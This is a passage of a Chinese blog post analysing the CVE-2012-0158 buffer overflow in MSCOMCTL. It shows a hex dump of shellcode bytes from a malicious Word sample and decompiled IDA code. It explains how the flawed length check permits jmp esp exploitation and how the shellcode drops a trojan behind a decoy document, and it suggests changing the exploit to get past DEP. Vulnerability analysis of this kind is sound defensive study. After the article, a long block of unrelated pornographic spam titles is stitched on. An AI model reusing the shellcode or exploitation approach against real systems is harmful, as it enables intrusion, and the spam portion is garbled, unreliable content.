001224d6 ?54 93 77 77 21 9d 4a 62 68 c3? T.ww!.Jbh.

001224e0 ?53 a3 83 6a 6b df 5c 5a 8a 1d? S..jk.\Z..

001224ea ?2b 4f 2c 45 28 81 71 f5 40 01? +O,E(.q.@.

001224f4 ?92 8f 05 ba 36 c1 0a 61 61 61? ....6..aaa

001224fe ?61 73 68 65 6c 6c 33 32 00 8b? ashell32..

00122508 ?98 8a 31 61 61 61 61 6f 70 65? ..1aaaaope

00122512 ?6e 00 e8 11 02 00 00 6a ff e8? n......j..

0012251c ?08 00 00 00 05 35 00 00 00 ff? .....5....

00122526 ?10 c3 e8 00 00 00 00 58 83 c0? .......X..

00122530 ?04 2d 77 00 00 00 c3 55 8b ec? .-w....U..

0012253a ?52 53 8b 55 08 33 c0 f7 d0 32? RS.U.3...2

00122544 ?02 b3 08 d1 e8 73 05 35 20 83? .....s.5 .

?

函數(shù)B

int __cdecl sub_275C88F4(void*a1, LPVOID lpMem, SIZE_T dwBytes)

{

? int result; // eax@1

? LPVOID v4; // ebx@1

? LPVOID v5; // eax@3

? int v6; // esi@4

? int v7; // [sp+Ch] [bp-4h]@1

? const void *v8; // [sp+1Ch] [bp+Ch]@3

?

? v4 = lpMem;

? result = (*(int (__stdcall **)(LPVOID, int *,signed int, _DWORD))(*(_DWORD *)lpMem + 12))(lpMem, &v7, 4, 0);//估計(jì)這里是讀取內(nèi)存區(qū)域內(nèi)某個(gè)標(biāo)記大小的值,長度為4

? if ( result >= 0 )

? {

??? if ( v7 == dwBytes ) //如果數(shù)據(jù)的大小剛好等于需要讀取的大小

??? {

????? v5 = HeapAlloc(hHeap, 0, dwBytes);//開辟堆內(nèi)存用于緩存

????? v8 = v5;

????? if ( v5 )

????? {

??????? v6 = (*(int (__stdcall **)(LPVOID,LPVOID, SIZE_T, _DWORD))(*(_DWORD *)v4 + 12))(v4, v5, dwBytes, 0);//讀取數(shù)據(jù)到堆內(nèi)存,長度為dwBytes

??????? if ( v6 >= 0 )

??????? {

????????? memcpy(a1, v8, dwBytes);//復(fù)制數(shù)據(jù)到母函數(shù)指定的地址,這里是母函數(shù)的臨時(shí)變量,指向棧內(nèi)

????????? v6 = (*(int (__stdcall **)(LPVOID,_UNKNOWN *, SIZE_T, _DWORD))(*(_DWORD *)v4 + 12))(

???????????????? v4,

???????????????? &unk_27633F78,

???????????????? ((dwBytes + 3) &0xFFFFFFFC) - dwBytes,

???????????????? 0);//剩余的數(shù)據(jù)長度小于等于3

??????? }

??????? HeapFree(hHeap, 0, (LPVOID)v8);

??????? result = v6;

????? }

????? else

????? {

??????? result = 0x8007000Eu;

????? }

??? }

??? else

??? {

????? result = 0x8000FFFFu;??? }

? }

? return result;

}

函數(shù)B內(nèi)部又調(diào)用了三次OLE32.DLL的函數(shù)unsignedint __stdcall CExposedStream__Read(LPVOID a1, LPVOID lp, unsigned int ucb, inta4),這是IDA反匯編出來的啊,這個(gè)函數(shù)內(nèi)部我就沒怎么仔細(xì)去看,大概猜到是從a1所指地址空間讀取ucb大小的字節(jié)到lp。

A函數(shù)總共也只開辟了0x14 = 20個(gè)字節(jié)的空間,第一次調(diào)用B復(fù)制了12個(gè)字節(jié),第二次本該最多復(fù)制8個(gè)字節(jié),這下你應(yīng)該明白為什么要小于等于8了吧!

綜上溢出的根源在A函數(shù)第二次調(diào)用B函數(shù)之前檢測數(shù)據(jù)長度的時(shí)候不小心犯了一個(gè)低級錯(cuò)誤,小于等于誤寫成大于等于,導(dǎo)致B函數(shù)復(fù)制大量數(shù)據(jù)到A函數(shù)的臨時(shí)變量當(dāng)中,造成了溢出。此漏洞是緩沖區(qū)溢出的經(jīng)典例子!~~微軟竟然也犯這么低級的錯(cuò)誤把用戶的安全完全拋之腦后了。A函數(shù)和B函數(shù)都沒開GS保護(hù),導(dǎo)致可以直接使用jmp esp這種原始的利用方式發(fā)起攻擊。這個(gè)炸彈估計(jì)很早以前就埋下了,不知道在這個(gè)0day的幫助下,有多少網(wǎng)民遭受到了黑帽子的毒手。。。真懷疑是微軟故意留的后門!

到此,整個(gè)漏洞的原因分析完畢,未完成的工作還有3個(gè):

1.??????word怎么解析得到那個(gè)長度字段,怎么提取和變換數(shù)據(jù)(7ffa4512在樣本doc里找不到),暫時(shí)沒有深究。有時(shí)間的話還可以繼續(xù)詳細(xì)跟蹤一下。

2.??????shellcode的分析。雖說這種釋放木馬和正常文檔的惡意樣本采用的shellocde都差不多,通過動態(tài)查找法找函數(shù)地址,然后通過GetFilesize函數(shù)循環(huán)找到自身文檔句柄,然后從某個(gè)偏移讀取藏在文檔中的木馬和正常文檔,然后釋放到臨時(shí)文件夾,執(zhí)行木馬,然后打開正常文檔掩蓋蹤跡等等。對于不熟悉的朋友可以分析一下,可以親身體驗(yàn)一下這個(gè)繁雜的過程。

3.??????沒開DEP可以輕松利用,但是開了DEP的話利用方法就得變化了??梢孕薷囊幌吕梅绞?#xff0c;該病毒的成功率會更高。

對這個(gè)漏洞感興趣的朋友也可以自己試試跟蹤分析一把。畢竟自己親自動手才有更深的體會。。。調(diào)試office漏洞需要耐心和一些經(jīng)驗(yàn),這個(gè)我就當(dāng)拋磚引玉了~~這個(gè)漏洞我也分析了兩天,這個(gè)過程還是有點(diǎn)艱難,但是也有很多的樂趣~如果你有新的發(fā)現(xiàn),還請分享出來。最后,謝謝大家~ ~~

?

本文檔經(jīng)過bitt的提醒,改正了一些錯(cuò)誤,特此感謝!

總結(jié)

以上是生活随笔為你收集整理的CVE-2012-0158 MSCOMCTL控件漏洞分析的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò),歡迎將生活随笔推薦給好友。

亚洲精品成人福利网站 | 极品尤物被啪到呻吟喷水 | 又大又黄又粗又爽的免费视频 | 免费观看又污又黄的网站 | 丰满妇女强制高潮18xxxx | 日日麻批免费40分钟无码 | 国产乱码精品一品二品 | 一本大道伊人av久久综合 | 中文字幕人成乱码熟女app | 无码一区二区三区在线 | 最新国产麻豆aⅴ精品无码 | 熟女少妇在线视频播放 | 国产成人综合色在线观看网站 | 国内精品九九久久久精品 | 黑人巨大精品欧美黑寡妇 | 久久国产自偷自偷免费一区调 | 国产一精品一av一免费 | 久久午夜无码鲁丝片午夜精品 | 高清国产亚洲精品自在久久 | 日本精品人妻无码77777 天堂一区人妻无码 | 少妇性俱乐部纵欲狂欢电影 | 久久久亚洲欧洲日产国码αv | 人人澡人人透人人爽 | 激情亚洲一区国产精品 | 天天拍夜夜添久久精品大 | 性欧美牲交在线视频 | 亚洲一区二区三区国产精华液 | 无码av最新清无码专区吞精 | 国产精品18久久久久久麻辣 | 国产精品久久国产三级国 | 国产午夜无码视频在线观看 | 欧美日韩一区二区免费视频 | 国产精品沙发午睡系列 | 国产精品美女久久久久av爽李琼 | 日本精品少妇一区二区三区 | 亚洲热妇无码av在线播放 | 欧美日韩在线亚洲综合国产人 | 欧洲欧美人成视频在线 | 中文字幕无码热在线视频 | 国产成人无码a区在线观看视频app | 久青草影院在线观看国产 | 日本精品人妻无码77777 天堂一区人妻无码 | 伊人久久婷婷五月综合97色 | 大色综合色综合网站 | 亚洲欧美日韩国产精品一区二区 | 久热国产vs视频在线观看 | 成人性做爰aaa片免费看 | 麻豆人妻少妇精品无码专区 | 国产真人无遮挡作爱免费视频 | 中文字幕无码人妻少妇免费 | 色婷婷香蕉在线一区二区 | 中文字幕久久久久人妻 | www国产精品内射老师 | 国产 浪潮av性色四虎 | 国产精品毛片一区二区 | 精品一区二区不卡无码av | 国产suv精品一区二区五 | 99久久久无码国产aaa精品 | 国产精品永久免费视频 | 人人妻人人澡人人爽人人精品 | 亚洲中文字幕va福利 | 国产精品怡红院永久免费 | 高清国产亚洲精品自在久久 | 美女扒开屁股让男人桶 | 牲欲强的熟妇农村老妇女视频 | 无码人妻出轨黑人中文字幕 | 久久伊人色av天堂九九小黄鸭 | 天天躁夜夜躁狠狠是什么心态 | 妺妺窝人体色www在线小说 | 波多野结衣一区二区三区av免费 | 亚洲精品午夜国产va久久成人 | 任你躁在线精品免费 | 亚洲人成网站免费播放 | 图片区 小说区 区 亚洲五月 | 亚洲国产精华液网站w | 3d动漫精品啪啪一区二区中 | 18无码粉嫩小泬无套在线观看 | 丰满少妇弄高潮了www | 又紧又大又爽精品一区二区 | 少妇愉情理伦片bd | 天天摸天天透天天添 | 领导边摸边吃奶边做爽在线观看 | 国产亚洲精品久久久久久 | 精品成在人线av无码免费看 | 国产成人综合美国十次 | 无码人妻丰满熟妇区五十路百度 | 婷婷五月综合激情中文字幕 | 久久久久免费看成人影片 | 夜夜躁日日躁狠狠久久av | 亚洲毛片av日韩av无码 | 麻豆国产97在线 | 欧洲 | 日本又色又爽又黄的a片18禁 | 又大又硬又黄的免费视频 | 免费无码一区二区三区蜜桃大 | 偷窥日本少妇撒尿chinese | 亚洲最大成人网站 | 又色又爽又黄的美女裸体网站 | 性欧美牲交xxxxx视频 | 精品国偷自产在线视频 | 久久精品女人天堂av免费观看 | 欧美日韩亚洲国产精品 | 欧美日韩人成综合在线播放 | 久久久久成人片免费观看蜜芽 | 无码精品国产va在线观看dvd | 无码播放一区二区三区 | 亚洲日韩中文字幕在线播放 | 人妻少妇精品无码专区二区 | 国产午夜无码视频在线观看 | 粗大的内捧猛烈进出视频 | 1000部夫妻午夜免费 | 成人女人看片免费视频放人 | 伊人色综合久久天天小片 | 妺妺窝人体色www在线小说 | 久久久精品456亚洲影院 | 综合人妻久久一区二区精品 | 亚洲综合无码久久精品综合 | 久久久国产精品无码免费专区 | 精品人妻中文字幕有码在线 | 天天拍夜夜添久久精品大 | 丰满人妻精品国产99aⅴ | 亚洲精品国产精品乱码不卡 | 99国产欧美久久久精品 | 中文字幕无码免费久久99 | 久久精品99久久香蕉国产色戒 | 少妇一晚三次一区二区三区 | 无码人妻丰满熟妇区五十路百度 | 中文字幕av无码一区二区三区电影 | 国产激情无码一区二区app | 亚洲成av人在线观看网址 | 亚洲а∨天堂久久精品2021 | 综合人妻久久一区二区精品 | 亚洲男人av香蕉爽爽爽爽 | 乌克兰少妇xxxx做受 | 日本大乳高潮视频在线观看 | 全球成人中文在线 | 精品欧洲av无码一区二区三区 | 99麻豆久久久国产精品免费 | 欧美国产日产一区二区 | 亚洲爆乳无码专区 | 无码人妻精品一区二区三区下载 | 成在人线av无码免费 | 曰本女人与公拘交酡免费视频 | 2019nv天堂香蕉在线观看 | 精品偷拍一区二区三区在线看 | 久久伊人色av天堂九九小黄鸭 | 国产精品对白交换视频 | 国产亚洲精品久久久久久国模美 | 中文字幕无码免费久久9一区9 | 亚洲精品午夜无码电影网 | 国产av无码专区亚洲a∨毛片 | 人人妻人人澡人人爽人人精品 | ass日本丰满熟妇pics | 中文精品久久久久人妻不卡 | 无套内谢老熟女 | 又湿又紧又大又爽a视频国产 | 国产精品久久久久久亚洲影视内衣 | 精品无码av一区二区三区 | 久久97精品久久久久久久不卡 | 久久久精品456亚洲影院 | 窝窝午夜理论片影院 | 女人被男人躁得好爽免费视频 | 亚洲精品一区二区三区在线观看 | 成人精品一区二区三区中文字幕 | 激情五月综合色婷婷一区二区 | 欧美黑人性暴力猛交喷水 | 久久亚洲中文字幕无码 | 久久精品人人做人人综合 | 午夜成人1000部免费视频 | 色欲综合久久中文字幕网 | 亚洲精品一区二区三区在线 | 55夜色66夜色国产精品视频 | 综合人妻久久一区二区精品 | 国产两女互慰高潮视频在线观看 | 久久国产精品二国产精品 | 中文亚洲成a人片在线观看 | 成人性做爰aaa片免费看不忠 | 男女下面进入的视频免费午夜 | 内射欧美老妇wbb | 中文字幕av无码一区二区三区电影 | 欧美人与牲动交xxxx | 亚洲国产av精品一区二区蜜芽 | 在线看片无码永久免费视频 | 日欧一片内射va在线影院 | 蜜臀av在线播放 久久综合激激的五月天 | 日本护士毛茸茸高潮 | 国精产品一品二品国精品69xx | 色噜噜亚洲男人的天堂 | 精品厕所偷拍各类美女tp嘘嘘 | 玩弄中年熟妇正在播放 | 少妇久久久久久人妻无码 | 欧美日韩一区二区综合 | 99在线 | 亚洲 | 亚洲国产高清在线观看视频 | 蜜桃av蜜臀av色欲av麻 999久久久国产精品消防器材 | 精品国产成人一区二区三区 | 国产一精品一av一免费 | 国产麻豆精品一区二区三区v视界 | 亚洲精品国偷拍自产在线观看蜜桃 | 又湿又紧又大又爽a视频国产 | 亚洲综合无码一区二区三区 | 国产午夜福利100集发布 | 日本精品少妇一区二区三区 | 国产免费无码一区二区视频 | 最新国产麻豆aⅴ精品无码 | 亚欧洲精品在线视频免费观看 | 国产真实乱对白精彩久久 | 东京无码熟妇人妻av在线网址 | 欧美 亚洲 国产 另类 | 成熟女人特级毛片www免费 | 中文亚洲成a人片在线观看 | 激情五月综合色婷婷一区二区 | 亚洲人成网站色7799 | 中文字幕无码av激情不卡 | 天堂无码人妻精品一区二区三区 | 色偷偷人人澡人人爽人人模 | 天下第一社区视频www日本 | 强奷人妻日本中文字幕 | 精品久久综合1区2区3区激情 | 乱码av麻豆丝袜熟女系列 | 四虎4hu永久免费 | 欧美真人作爱免费视频 | av无码久久久久不卡免费网站 | 成人av无码一区二区三区 | 免费播放一区二区三区 | 欧美黑人性暴力猛交喷水 | 久久久久av无码免费网 | 日本大乳高潮视频在线观看 | 国产xxx69麻豆国语对白 | 久久成人a毛片免费观看网站 | 中文字幕色婷婷在线视频 | 欧美黑人性暴力猛交喷水 | 亚洲理论电影在线观看 | 在线a亚洲视频播放在线观看 | 一本色道久久综合狠狠躁 | 大乳丰满人妻中文字幕日本 | 伊人久久大香线蕉亚洲 | 天天综合网天天综合色 | 亚洲成av人综合在线观看 | 久久无码中文字幕免费影院蜜桃 | 少妇的肉体aa片免费 | 国产网红无码精品视频 | 女人被男人爽到呻吟的视频 | 强开小婷嫩苞又嫩又紧视频 | 樱花草在线播放免费中文 | 国精产品一区二区三区 | 国精产品一品二品国精品69xx | 中文字幕无码人妻少妇免费 | 国产欧美熟妇另类久久久 | 日本熟妇人妻xxxxx人hd | 2020久久超碰国产精品最新 | 国产精品无码mv在线观看 | 日本在线高清不卡免费播放 | 国产无遮挡又黄又爽又色 | 久久精品女人的天堂av | 一二三四在线观看免费视频 | 国内少妇偷人精品视频免费 | 少女韩国电视剧在线观看完整 | 少女韩国电视剧在线观看完整 | 国产亚洲精品久久久ai换 | 波多野结衣乳巨码无在线观看 | 欧美人与牲动交xxxx | 久久久久亚洲精品中文字幕 | 色综合久久中文娱乐网 | 国产精品久久久一区二区三区 | 日本精品高清一区二区 | 性欧美牲交在线视频 | 亚洲a无码综合a国产av中文 | 性欧美熟妇videofreesex | 中文无码成人免费视频在线观看 | 亚洲 高清 成人 动漫 | 少妇人妻大乳在线视频 | 麻豆国产丝袜白领秘书在线观看 | 久久精品人妻少妇一区二区三区 | 国产乱人偷精品人妻a片 | 国産精品久久久久久久 | 国产精品丝袜黑色高跟鞋 | 日产精品高潮呻吟av久久 | 国产绳艺sm调教室论坛 | 久久精品国产一区二区三区肥胖 | 国产 浪潮av性色四虎 | 国产熟妇高潮叫床视频播放 | 天天摸天天透天天添 | 又大又硬又爽免费视频 | 丝袜 中出 制服 人妻 美腿 | 无码免费一区二区三区 | 亚洲成av人影院在线观看 | 国产精品亚洲а∨无码播放麻豆 | 国产又爽又黄又刺激的视频 | 日本又色又爽又黄的a片18禁 | 熟妇女人妻丰满少妇中文字幕 | 亚洲最大成人网站 | 国产av剧情md精品麻豆 | 国产免费久久精品国产传媒 | 伊人久久大香线蕉av一区二区 | 波多野结衣乳巨码无在线观看 | 亚洲色www成人永久网址 | 欧美真人作爱免费视频 | 麻豆果冻传媒2021精品传媒一区下载 | 六十路熟妇乱子伦 | 精品人妻人人做人人爽夜夜爽 | 伊人久久大香线蕉午夜 | 国产国产精品人在线视 | 亚洲熟熟妇xxxx | 日本乱偷人妻中文字幕 | 人妻尝试又大又粗久久 | 国产精品久久久久久亚洲毛片 | 男女下面进入的视频免费午夜 | 成人性做爰aaa片免费看 | 免费人成在线视频无码 | 日韩在线不卡免费视频一区 | 日本一区二区更新不卡 | 久久99久久99精品中文字幕 | 一本久道高清无码视频 | 国产人妻久久精品二区三区老狼 | 亚洲欧洲中文日韩av乱码 | 国产深夜福利视频在线 | 成熟妇人a片免费看网站 | 色狠狠av一区二区三区 | 人人爽人人澡人人人妻 | 亚洲日韩精品欧美一区二区 | 精品偷自拍另类在线观看 | 色婷婷综合中文久久一本 | 秋霞成人午夜鲁丝一区二区三区 | 成人无码视频在线观看网站 | 亚洲熟妇色xxxxx欧美老妇 | 久久人妻内射无码一区三区 | 久久99精品久久久久久动态图 | 日韩视频 中文字幕 视频一区 | 丰满岳乱妇在线观看中字无码 | 粗大的内捧猛烈进出视频 | 亚洲色在线无码国产精品不卡 | 国产在线一区二区三区四区五区 | 午夜性刺激在线视频免费 | 日本肉体xxxx裸交 | 国产成人人人97超碰超爽8 | 蜜桃av蜜臀av色欲av麻 999久久久国产精品消防器材 | 国产亚洲人成a在线v网站 | 人人妻人人澡人人爽精品欧美 | а√资源新版在线天堂 | 欧美色就是色 | 99精品久久毛片a片 | 爱做久久久久久 | 亚洲色在线无码国产精品不卡 | 午夜丰满少妇性开放视频 | 国产精品高潮呻吟av久久4虎 | 青草青草久热国产精品 | 国产麻豆精品精东影业av网站 | 无码人妻丰满熟妇区五十路百度 | 亚洲一区二区三区国产精华液 | 午夜肉伦伦影院 | 色综合久久久无码网中文 | 久久人人爽人人爽人人片av高清 | 蜜桃视频韩日免费播放 | 国产精品福利视频导航 | 日韩欧美群交p片內射中文 | 国产在线精品一区二区高清不卡 | 扒开双腿吃奶呻吟做受视频 | 亚洲人成影院在线无码按摩店 | 精品国偷自产在线 | 亚洲日韩av一区二区三区中文 | 久久无码中文字幕免费影院蜜桃 | 色五月丁香五月综合五月 | 全黄性性激高免费视频 | 少妇的肉体aa片免费 | 精品无码av一区二区三区 | 国产精品久久久一区二区三区 | 又大又黄又粗又爽的免费视频 | 精品日本一区二区三区在线观看 | 亚洲人成网站在线播放942 | 色情久久久av熟女人妻网站 | 成人性做爰aaa片免费看不忠 | 国产精品欧美成人 | 麻豆蜜桃av蜜臀av色欲av | 51国偷自产一区二区三区 | 亚洲中文字幕久久无码 | 4hu四虎永久在线观看 | 牲欲强的熟妇农村老妇女 | 极品嫩模高潮叫床 | 色婷婷综合激情综在线播放 | 亚洲中文字幕无码一久久区 | 亚洲娇小与黑人巨大交 | 婷婷色婷婷开心五月四房播播 | 亚洲人亚洲人成电影网站色 | 人人妻人人澡人人爽精品欧美 | 少妇无码一区二区二三区 | 国产又粗又硬又大爽黄老大爷视 | 人妻无码久久精品人妻 | 久久国产精品_国产精品 | 亚洲s色大片在线观看 | 麻豆成人精品国产免费 | 色综合久久久久综合一本到桃花网 | 综合激情五月综合激情五月激情1 | 中文字幕无码人妻少妇免费 | 久久五月精品中文字幕 | 无码帝国www无码专区色综合 | 最近的中文字幕在线看视频 | 国产农村乱对白刺激视频 | 日本丰满熟妇videos | 夜精品a片一区二区三区无码白浆 | 亚洲精品久久久久avwww潮水 | 2020久久超碰国产精品最新 | 麻豆国产丝袜白领秘书在线观看 | 色偷偷人人澡人人爽人人模 | 麻豆md0077饥渴少妇 | 国产精品美女久久久久av爽李琼 | 人人爽人人爽人人片av亚洲 | 爽爽影院免费观看 | 精品无码国产自产拍在线观看蜜 | 18无码粉嫩小泬无套在线观看 | 久久无码专区国产精品s | 无码人妻精品一区二区三区不卡 | 亚洲成a人片在线观看日本 | 欧美黑人巨大xxxxx | 成人无码精品一区二区三区 | 久久亚洲中文字幕精品一区 | 亚洲综合在线一区二区三区 | 久久久久av无码免费网 | 狠狠色色综合网站 | 日韩人妻少妇一区二区三区 | 国产口爆吞精在线视频 | 亚洲国精产品一二二线 | 老司机亚洲精品影院 | 亚洲大尺度无码无码专区 | 日本精品少妇一区二区三区 | 成人无码影片精品久久久 | 国产sm调教视频在线观看 | 免费观看的无遮挡av | 无码国产色欲xxxxx视频 | 欧美丰满熟妇xxxx | 人人澡人人透人人爽 | 国产精品多人p群无码 | 丰满少妇熟乱xxxxx视频 | 国产亚洲视频中文字幕97精品 | 中国女人内谢69xxxx | 亚洲精品一区三区三区在线观看 | 亚洲娇小与黑人巨大交 | 亚洲国产精品无码一区二区三区 | 久久久久久久久蜜桃 | 国产特级毛片aaaaaaa高清 | 久久久久久a亚洲欧洲av冫 | 亚洲熟妇色xxxxx亚洲 | 国产又爽又猛又粗的视频a片 | 亚无码乱人伦一区二区 | 玩弄少妇高潮ⅹxxxyw | 一本加勒比波多野结衣 | 国产午夜亚洲精品不卡 | 少妇人妻偷人精品无码视频 | 色一情一乱一伦一区二区三欧美 | 国产精品无码一区二区桃花视频 | 亚洲中文无码av永久不收费 | 久久国内精品自在自线 | 亚洲精品鲁一鲁一区二区三区 | 天天摸天天透天天添 | 国产超级va在线观看视频 | 久久亚洲日韩精品一区二区三区 | 荫蒂添的好舒服视频囗交 | 亚洲国产精品一区二区第一页 | 老头边吃奶边弄进去呻吟 | 无码av最新清无码专区吞精 | 国产亚洲精品精品国产亚洲综合 | 精品一区二区三区无码免费视频 | 日日摸夜夜摸狠狠摸婷婷 | 国精产品一品二品国精品69xx | 国产av人人夜夜澡人人爽麻豆 | 国产高清av在线播放 | 日韩精品乱码av一区二区 | 青草视频在线播放 | 亚洲精品国产品国语在线观看 | 午夜精品久久久久久久 | 欧美日韩亚洲国产精品 | 国色天香社区在线视频 | 久久久久人妻一区精品色欧美 | 久久综合色之久久综合 | 国产区女主播在线观看 | 日本一区二区三区免费高清 | 丝袜 中出 制服 人妻 美腿 | 国产乱人伦偷精品视频 | 麻豆果冻传媒2021精品传媒一区下载 | 中文字幕亚洲情99在线 | 强辱丰满人妻hd中文字幕 | 欧美精品无码一区二区三区 | 在线精品亚洲一区二区 | 丰满少妇女裸体bbw | 亚洲中文字幕乱码av波多ji | 伊人久久大香线焦av综合影院 | 国语自产偷拍精品视频偷 | 成年美女黄网站色大免费视频 | 性色欲情网站iwww九文堂 | 一本久久a久久精品vr综合 | 亚洲精品成人福利网站 | 无码av最新清无码专区吞精 | 丝袜人妻一区二区三区 | 奇米影视7777久久精品 | 日日橹狠狠爱欧美视频 | 人妻无码久久精品人妻 | 国产精品爱久久久久久久 | 狠狠亚洲超碰狼人久久 | 欧美性猛交xxxx富婆 | 久久久www成人免费毛片 | 午夜性刺激在线视频免费 | 亚洲国产精品毛片av不卡在线 | 国产精品嫩草久久久久 | а天堂中文在线官网 | 无码av最新清无码专区吞精 | 亚洲无人区午夜福利码高清完整版 | 精品偷拍一区二区三区在线看 | 男女作爱免费网站 | 初尝人妻少妇中文字幕 | 性色欲情网站iwww九文堂 | 98国产精品综合一区二区三区 | 久久综合久久自在自线精品自 | 色偷偷av老熟女 久久精品人妻少妇一区二区三区 | 极品嫩模高潮叫床 | 国产性生交xxxxx无码 | 天天燥日日燥 | 婷婷综合久久中文字幕蜜桃三电影 | 日本一卡2卡3卡4卡无卡免费网站 国产一区二区三区影院 | 中国女人内谢69xxxx | 熟妇人妻中文av无码 | 色噜噜亚洲男人的天堂 | 亚洲精品中文字幕久久久久 | 精品人妻中文字幕有码在线 | 久久无码专区国产精品s | 六月丁香婷婷色狠狠久久 | 97久久精品无码一区二区 | 18禁黄网站男男禁片免费观看 | 免费无码的av片在线观看 | 亚洲精品国偷拍自产在线麻豆 | 97精品人妻一区二区三区香蕉 | 九九热爱视频精品 | 中文毛片无遮挡高清免费 | 日韩人妻系列无码专区 | 亚洲国产精华液网站w | √8天堂资源地址中文在线 | 极品嫩模高潮叫床 | 97久久超碰中文字幕 | 乱人伦人妻中文字幕无码 | 中国女人内谢69xxxxxa片 | 啦啦啦www在线观看免费视频 | 久久无码人妻影院 | 免费人成网站视频在线观看 | 久久人人爽人人人人片 | 免费播放一区二区三区 | 亚洲欧美国产精品专区久久 | 亚洲精品国偷拍自产在线麻豆 | 国产精品久久久久久亚洲影视内衣 | 国产精品99久久精品爆乳 | 色综合久久88色综合天天 | 东京热无码av男人的天堂 | 激情爆乳一区二区三区 | 成 人 网 站国产免费观看 | av人摸人人人澡人人超碰下载 | 免费无码的av片在线观看 | 1000部啪啪未满十八勿入下载 | 日韩视频 中文字幕 视频一区 | 美女扒开屁股让男人桶 | 性色av无码免费一区二区三区 | 伊人久久大香线蕉亚洲 | 国产乱人伦av在线无码 | 国产尤物精品视频 | 国产精品久久久久久无码 | 在线观看欧美一区二区三区 | 亚洲色成人中文字幕网站 | 国产成人精品必看 | 国产办公室秘书无码精品99 | 国产精品理论片在线观看 | 成人无码影片精品久久久 | 欧美日韩视频无码一区二区三 | 午夜免费福利小电影 | 偷窥村妇洗澡毛毛多 | 国产高清av在线播放 | 久久久久99精品国产片 | 亚洲成熟女人毛毛耸耸多 | 黄网在线观看免费网站 | 日本护士毛茸茸高潮 | 久久久久成人片免费观看蜜芽 | 日本一区二区三区免费高清 | 麻豆人妻少妇精品无码专区 | 日韩无码专区 | 欧美阿v高清资源不卡在线播放 | 日本大香伊一区二区三区 | a在线观看免费网站大全 | 中文字幕人妻丝袜二区 | 午夜精品一区二区三区的区别 | 内射巨臀欧美在线视频 | 国产精品亚洲综合色区韩国 | 婷婷丁香五月天综合东京热 | 无码帝国www无码专区色综合 | 亚洲成a人片在线观看无码3d | 欧美国产日韩亚洲中文 | 久久国产精品_国产精品 | 亚洲熟妇色xxxxx亚洲 | 亚洲伊人久久精品影院 | 亚洲综合无码久久精品综合 | 亚洲欧洲无卡二区视頻 | 欧美丰满熟妇xxxx性ppx人交 | 欧美人妻一区二区三区 | 国产肉丝袜在线观看 | 国产精品久免费的黄网站 | 国产三级久久久精品麻豆三级 | 欧美人与善在线com | 玩弄少妇高潮ⅹxxxyw | 久久精品无码一区二区三区 | 亚洲综合色区中文字幕 | 扒开双腿吃奶呻吟做受视频 | 精品偷拍一区二区三区在线看 | 亚洲日韩精品欧美一区二区 | 巨爆乳无码视频在线观看 | 中文字幕人妻丝袜二区 | 蜜臀av在线播放 久久综合激激的五月天 | 亚洲中文字幕无码中文字在线 | 精品国产一区av天美传媒 | 131美女爱做视频 | 永久黄网站色视频免费直播 | 亚洲一区二区三区国产精华液 | 亚洲国产精品久久久天堂 | 中文无码成人免费视频在线观看 | 纯爱无遮挡h肉动漫在线播放 | 无人区乱码一区二区三区 | 丰腴饱满的极品熟妇 | 天天拍夜夜添久久精品 | 久久99精品国产麻豆蜜芽 | 久久99精品国产麻豆 | 欧美日韩色另类综合 | 小鲜肉自慰网站xnxx | 国产精品亚洲lv粉色 | 亚洲精品国产品国语在线观看 | 亚洲精品久久久久avwww潮水 | 午夜精品一区二区三区在线观看 | 激情亚洲一区国产精品 | 日本护士xxxxhd少妇 | 狠狠亚洲超碰狼人久久 | 亚洲天堂2017无码中文 | 清纯唯美经典一区二区 | 少女韩国电视剧在线观看完整 | 亚洲精品成a人在线观看 | 嫩b人妻精品一区二区三区 | 成 人影片 免费观看 | 高中生自慰www网站 | 日本免费一区二区三区最新 | 久久国产精品_国产精品 | 一个人看的视频www在线 | 大乳丰满人妻中文字幕日本 | 亲嘴扒胸摸屁股激烈网站 | 久久久久久av无码免费看大片 | 99国产欧美久久久精品 | 牲欲强的熟妇农村老妇女视频 | 国产人妻精品一区二区三区不卡 | 欧美精品一区二区精品久久 | 两性色午夜免费视频 | 丝袜 中出 制服 人妻 美腿 | 欧美黑人性暴力猛交喷水 | 久久午夜无码鲁丝片秋霞 | 日韩少妇白浆无码系列 | 国产精品视频免费播放 | 日本一区二区更新不卡 | 精品成人av一区二区三区 | 日韩人妻少妇一区二区三区 | 国产精品美女久久久久av爽李琼 | 丰满护士巨好爽好大乳 | 亚洲经典千人经典日产 | 亲嘴扒胸摸屁股激烈网站 | 乌克兰少妇xxxx做受 | 中文字幕精品av一区二区五区 | 牲欲强的熟妇农村老妇女 | 最新版天堂资源中文官网 | 国产人成高清在线视频99最全资源 | 青青草原综合久久大伊人精品 | 亚洲欧美日韩成人高清在线一区 | 红桃av一区二区三区在线无码av | 日本乱人伦片中文三区 | 久久99精品久久久久久 | 欧美性猛交xxxx富婆 | 亚洲成在人网站无码天堂 | 亚洲一区二区三区国产精华液 | 人妻少妇被猛烈进入中文字幕 | 18无码粉嫩小泬无套在线观看 | 一本久久a久久精品vr综合 | 亚洲欧美日韩国产精品一区二区 | 国产热a欧美热a在线视频 | 国产热a欧美热a在线视频 | 人人妻人人澡人人爽人人精品 | 亚洲国产精品美女久久久久 | 少妇高潮喷潮久久久影院 | 丰满少妇熟乱xxxxx视频 | 国产小呦泬泬99精品 | 思思久久99热只有频精品66 | 日日躁夜夜躁狠狠躁 | 2019nv天堂香蕉在线观看 | v一区无码内射国产 | 樱花草在线播放免费中文 | 国语精品一区二区三区 | 乱人伦人妻中文字幕无码 | 亚洲高清偷拍一区二区三区 | 日韩无码专区 | 鲁大师影院在线观看 | 欧美性猛交xxxx富婆 | 国产午夜精品一区二区三区嫩草 | 国产人妻精品一区二区三区不卡 | 国产成人无码午夜视频在线观看 | 亚洲成a人片在线观看无码3d | 思思久久99热只有频精品66 | 少妇无套内谢久久久久 | 日韩av无码一区二区三区 | 国产精品高潮呻吟av久久4虎 | 波多野结衣一区二区三区av免费 | 国产在线aaa片一区二区99 | 色情久久久av熟女人妻网站 | 激情综合激情五月俺也去 | 亚洲综合无码久久精品综合 | 亚洲中文字幕成人无码 | 欧美变态另类xxxx | 少妇厨房愉情理9仑片视频 | 亚洲成a人片在线观看无码 | 狠狠综合久久久久综合网 | 无码国产色欲xxxxx视频 | 正在播放东北夫妻内射 | 牲欲强的熟妇农村老妇女 | 女人被爽到呻吟gif动态图视看 | 